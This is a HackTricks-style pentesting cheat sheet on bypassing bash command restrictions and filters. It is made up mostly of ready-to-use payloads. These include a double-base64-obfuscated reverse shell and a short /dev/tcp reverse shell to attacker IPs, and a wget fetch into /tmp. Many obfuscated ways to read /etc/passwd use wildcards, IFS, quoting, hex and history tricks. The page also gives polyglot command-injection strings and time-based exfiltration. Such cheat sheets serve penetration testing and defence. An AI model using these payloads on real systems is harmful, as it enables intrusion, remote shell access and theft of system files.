HackTricks
Search…
Pentesting
Powered By GitBook
Bypass Bash Restrictions

Reverse Shell

1
# Double-Base64 is a great way to avoid bad characters like +, works 99% of the time
2
echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
3
#echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
Copied!

Short Rev shell

1
#Trick from Dikline
2
#Get a rev shell with
3
(sh)0>/dev/tcp/10.10.10.10/443
4
#Then get the out of the rev shell executing inside of it:
5
exec >&0
Copied!

Bypass Paths and forbidden words

1
# Question mark binary substitution
2
/usr/bin/p?ng # /usr/bin/ping
3
nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost
4
5
# Wildcard(*) binary substitution
6
/usr/bin/who*mi # /usr/bin/whoami
7
8
# Wildcard + local directory arguments
9
touch -- -la # -- stops processing options after the --
10
ls *
11
12
# [chars]
13
/usr/bin/n[c] # /usr/bin/nc
14
15
# Quotes / Concatenation
16
'p'i'n'g # ping
17
"w"h"o"a"m"i # whoami
18
\u\n\a\m\e \-\a # uname -a
19
ech''o test # echo test
20
ech""o test # echo test
21
bas''e64 # base64
22
/\b\i\n/////s\h
23
24
# Execution through $0
25
echo whoami|$0
26
27
# Uninitialized variables: A uninitialized variable equals to null (nothing)
28
cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol
29
p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters
30
31
# Fake commands
32
p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown
33
w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown
34
35
# Concatenation of strings using history
36
!-1 # This will be substitute by the last command executed, and !-2 by the penultimate command
37
mi # This will throw an error
38
whoa # This will throw an error
39
!-1!-2 # This will execute whoami
Copied!

Bypass forbidden spaces

1
# {form}
2
{cat,lol.txt} # cat lol.txt
3
{echo,test} # echo test
4
5
## IFS - Internal field separator, change " " for any other character ("]" in this case)
6
cat${IFS}/etc/passwd # cat /etc/passwd
7
cat$IFS/etc/passwd # cat /etc/passwd
8
9
# Put the command line in a variable and then execute it
10
IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b
11
IFS=];b=cat]/etc/passwd;$b # Using 2 ";"
12
IFS=,;`cat<<<cat,/etc/passwd` # Using cat twice
13
# Other way, just change each space for ${IFS}
14
echo${IFS}test
15
16
# Using hex format
17
X=$'cat\x20/etc/passwd'&&$X
18
19
# New lines
20
p\
21
i\
22
n\
23
g # These 4 lines will equal to ping
24
25
## Undefined variables and !
26
$u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined
27
uname!-1\-a # This equals to uname -a
Copied!

Bypass backslash and slash

1
cat ${HOME:0:1}etc${HOME:0:1}passwd
2
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
Copied!

Bypass with hex encoding

1
echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
2
cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
3
abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat abc
4
`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
5
cat `xxd -r -p <<< 2f6574632f706173737764`
6
xxd -r -ps <(echo 2f6574632f706173737764)
7
cat `xxd -r -ps <(echo 2f6574632f706173737764)`
Copied!

Bypass IPs

1
# Decimal IPs
2
127.0.0.1 == 2130706433
Copied!

Time based data exfiltration

1
time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
Copied!

DNS data exfiltration

You could use burpcollab or pingb for example.

Polyglot command injection

1
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
2
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
Copied!

References & More

PayloadsAllTheThings/Command Injection at master · swisskyrepo/PayloadsAllTheThings
GitHub
GitHub - Bo0oM/WAF-bypass-Cheat-Sheet: Another way to bypass WAF Cheat Sheet (draft)
GitHub
Web Application Firewall (WAF) Evasion Techniques #2
Medium
Web Application Firewall (WAF) Evasion Techniques #3
Secjuice
Last modified 6mo ago